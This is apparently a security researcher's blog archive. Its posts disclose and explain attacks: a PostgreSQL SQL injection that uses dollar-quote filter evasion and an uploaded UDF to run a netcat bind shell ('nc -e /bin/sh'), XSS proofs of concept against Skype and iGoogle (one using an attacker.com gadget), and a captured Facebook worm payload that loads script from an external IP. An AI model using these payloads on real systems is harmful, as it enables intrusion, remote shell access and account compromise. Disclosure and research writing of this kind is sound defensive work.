Kos SecurityA blog about security.

[RL] PostgreSQL String Filter Evasion & UDF

Recently I came across an application that:

I had straight up SQL injection (on an INSERT statement, but fortunately stacked queries are supported in PostgreSQL + ASP.NET/JSP), but I was having a hard time getting things to work nicely.

After a little bit of searching for filter evasion and PostgreSQL, I discovered this paper: Advanced PostgreSQL SQL Injection and Filter Bypass Techniques by
Leon Juranić of DefenseCode.

I suggest reading the whole paper, it’s great, but what I took away from it was exactly what I needed at the time. It turns out that in PostgreSQL, to denominate a string, you can use single tick (‘), quotes (“), or, get this, double dollar signs ($$).

The reason for this is to make SQL more readable when including single ticks and qoutes.
Imagine a query like:

SELECT * FROM shops WHERE shopName ID = 'Rick\'s Ice Cream';

Notice the escape character? (Disregard the fact that I could have just used double quotes instead.) PostgreSQL decided to solve this solution by adding another delimiter, the double dollar signs ($$). So suddenly, the above statement becomes:

SELECT * FROM shops WHERE shopName ID = $$Rick's Ice Cream$$;

Here’s the documentation on it. What does this mean? Easier filter evasion for us!

But that’s not all I faced during my testing. It turns out, that as of PostgreSQL 8.2 or 8.3, PostgreSQL will not longer allow you to load a C library unless the PostgreSQL “Magic Token” has been defined, PG_MODULE_MAGIC;. This means that I can’t simply load /lib/libc.so anymore, which means I can’t map a new user defined function to system()! Bummer!

Fortunately, I was able to discover file upload functionality in this application that let me upload binary files, I simply snipped out SQLMap‘s lib_postgresqludf_sys.c, compiled it against the version of PostgreSQL I was attacking, and boom, I had a valid C library that I could load into PostgreSQL with and execute system() functions.

In the end, the SQL statement looked like this, with my attack vector in bold.

SELECT * FROM users WHERE ID = 1;CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS $$/www/some/upload/path/uploadedfile.so$$, $$system$$ LANGUAGE $$C$$ STRICT;select system($$ nc -e /bin/sh -l 1025 $$);– and password = ‘password’;

Hacking Google Chrome OS

Presented at BlackHat USA 2011, BSidesLV 2011, and Defcon 19 (2011). WhitePaper:



Presentation Slides:



Video after the break.
(more…)

The Hidden XSS Attacking the Desktop & Mobile Platforms – Slides & Video

A few weeks ago (October 2th) I was in Louisville, Kentucky, giving a talk at Derbycon. I also gave the same talk in San Diego (October 9th) at Toorcon 13. It’s a much expanded version of a talk I did back in June at Toorcon Seattle, “XSS Without the Browser”.

Slides are below, and video is after the break. The slides are a bit different than the video. I modified, reordered, and added a few slides, and also included a new Google application vulnerability.



(more…)

Toorcon Seattle 2011, “XSS Without the Browser”

Toorcon Seattle 2011, “XSS Without the Browser” (PDF). Presentation I gave about embedded HTML/Javascript engines, and potential security risks with whe not implemented securely. An old Skype bug is used as an example.



Skype OS X Cross-Site Scripting Vulnerability

Vulnerability: Cross Site Scripting

Affects: Skype 5.0.x to <= 5.0.914 (OS X) (Download | Local Mirror)

Skype (http://skype.com/) was vulnerable to (persistent?) XSS via messages from other users.

On top of that, the DOM of this window does not contain a set Origin, so it is possible to "bypass" the cross origin policy.

Authentication Status: Logged into skype, but persists in logs,
so a user can be exploited again if viewing logs. Default privacy
settings require a user to add the attacker as a contact.
Attribution:

Inject used in attack


http://kos.io/"><script>alert(1)</script>

More advanced attacks:

(more…)

Facebook XSS

Some cross-site scripting that was being spread on Facebook. I allowed myself to be compromised (for science!) and opened up a BURP instance beforehand. (Red link is to the actual javascript that sent out messages.)

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.144.114.105
X-Cnection: close
Date: Thu, 07 Apr 2011 05:49:39 GMT
Content-Length: 121182

*SNIP*

                                <div>
                                        <div id="app205712022786034_permalink_header_alt" fbcontext="dc593d496581">
                                                <div>
                                                        <a href="http://www.facebook.com/bonaparte" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;"><img src="http://i.imgur.com/dPewU.png" /></a>
                                                </div>
                                                <div>
                                                        <h2>Videos Posted by Maria Gonzales</h2>
                                                        <div>
                                                                <div>
                                                                </div>
                                                        </div>
                                                </div>
                                        </div>
                                        <div id="app205712022786034_player" style="border: 0px none #ffffff;" fbcontext="dc593d496581">
                                                <a href=" javascript:if(window.opener)&#123; window.opener.document.body.appendChild(document.createElement(&#039;script&#039;)).src=&#039;[NOT A REAL LINK TO THE ATTACKER]http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&amp;app_link=http://fb.me/TzCxMrJW&amp;embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&amp;im_text=haha! hilarous&#039;; window.close(); &#125;else&#123; document.body.appendChild(document.createElement(&#039;script&#039;)).src=&#039;[NOT A REAL LINK TO THE ATTACKER]http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&amp;app_link=http://fb.me/TzCxMrJW&amp;embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&amp;im_text=haha! hilarous&#039;; &#125;" target="_blank" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;"><img src="http://i.imgur.com/8hZd5.png" border="0" /></a>
                                        </div>
                                        <div id="app205712022786034_video_info" fbcontext="dc593d496581">
                                                <div id="app205712022786034_video_metadata" fbcontext="dc593d496581">
                                                        <h3>Teacher Pushes Attacking Bully To The Ground</h3>
                                                        <div>
                                                                 by <a href="http://www.facebook.com/bonaparte" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;">Maria Gonzales</a> (<a href="/video/?id=" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;">videos</a>)
                                                        </div>
                                                        <div>
                                                                <strong>2:30</strong><br /><br />
                                                        </div>
                                                </div>
                                                <div id="app205712022786034_description" fbcontext="dc593d496581">
                                                        <div>
                                                          He should be commended, but sadly, in todays world, he'll probably get in trouble. 
                                                        </div>
                                                </div>
                                                <a role="button" href="/ajax/share_dialog.php?s=&#039;11&amp;appid=2392950137&amp;p[]=487808128343&amp;p[]=&amp;p[]=" title="send this to friends or post it on your profile." onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;"><span>Share</span></a>
                                                <div id="app205712022786034_video_actions" fbcontext="dc593d496581">
                                                        <ul>
                                                                <li>
                                                                <div>
                                                                        <a href="#" id="app205712022786034_lowqual_toggle" title="watch &quot;bonaparte - menschen live (video) [hd]&quot; in regular quality." onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;" fbcontext="dc593d496581">
                                                                        View in Regular Quality</a>
                                                                </div>
                                                                <a href="#" id="app205712022786034_highqual_toggle" title="watch &quot;bonaparte - menschen live (video) [hd]&quot; in high quality." onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;" fbcontext="dc593d496581">View in High Quality</a>
                                                                </li>
                                                                <li><a href="/ajax/report.php?content_type=&#039;13&amp;cid=487808128343&amp;h=AQDMzuGzYxeiGADv" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;">Report Video</a></li>
                                                        </ul>
                                                </div>
                                        </div>

*SNIP*

Hacking Google – Part 2

Vulnerability: Cross Site Scripting

Affects: Any browser that supports javascript to be executed from CSS. IE6, IE7, and the latest version of Opera were tested.

iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via CSS injection on a custom theme.

Authentication Status: both unauth and auth

 

URL used in attack
http://www.google.com/ig

 

Payload:
POST /ig/skin_submit_xhr?tmprivacy=1&et=4cdb0f0bQKHcNSc5&referrer=tm HTTP/1.1

{"title":"test","author":"test","description":"","skin":
        [{"background_image":"');}body{background-image:expression(alert(document.domain));
        -o-link:'javascript:alert(document.domain)';-o-link-source:current}/*","logo_color":"white","logo_hex_color":"FFFFFF",
        "background_color":"D1ECF9","gadget_border":"6685b8","gadget_top_background":"6685b8",
        "gadget_top_text":"CEECFC","tab_background":"D1ECF9","tab_border":"93BDD1",
        "tab_text":"3A5787","selected_text":"3A5787","gadget_icon":"00a9ff","icon_color":"00a9ff"}]}

How it’s reflected on the page:

When the iGoogle page is loaded, if theme (which is attached to a tab) is selected, it will trigger instantly.
If the tab is not selected, if a user selects the tab, it will then trigger.

GET /ig/skin_xml_to_css?hl=en&gl=us&v2=1&url=http://www.google.com/ig/tm%3Foutput%3Dxml%26te%3DFYvZBahVsoU&skindx=ix:0&fp=lUTDcevwYRs HTTP/1.1

....');}body{background-image:expression(alert(document.domain));-o-link:'javascript:alert(document.domain)';
-o-link-source:current}@import 'data:,*{x:expression(alert(document.domain))}';/*') no-repeat top center;}/* google logo */....

The Danger

A user can share a tab with other users via invitation. If the victim accepts the tab invitation, then the theme with the attached malicious CSS will be added to their page.

Resolution

This issue was resolved in about a week.

Hacking Google – Part 1

Vulnerability: Cross Site Scripting

Affects: all browsers.

iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via untrusted gadgets hosted on offsite domains.

Authentication Status: both unauth and auth

 

URL used in attack
http://www.google.com/ig/adde?moduleurl=attacker.com/payload.xml&source=lpep&mkhp=0

attacker.com/payload.xml:
<ModulePrefs author="Kyle" author_email=""
        description="__MSG_description__" thumbnail="http://www.google.com/images/firefox/sprite2.png"
        screenshot="http://www.google.com/images/firefox/sprite2.png"
        title_url="javascript:alert(document.domain);"  title="[TITLE OF GADGET]" height="165">
        <Require feature="setprefs" />
        <Require feature="views" />
        <Require feature="dynamic-height" />
....
</ModulePrefs>

How it’s reflected on the page:

....
<a id="m_8_url" href="javascript:alert(document.domain);" target="_blank"><span id="m_8_title">[TITLE OF GADGET]</span></a>
....
(The "Hax" string below is the title of the gadget, which was what the reflected link above is)

Resolution

This issue was resolved very quickly.
Google now just replaces anything that doesn’t have a protocol of http or https with the path the file is hosted on.
If the file is hosted at http://attacker.com/path/to/file.xml, the URL becomes http://attacker.com/path/to/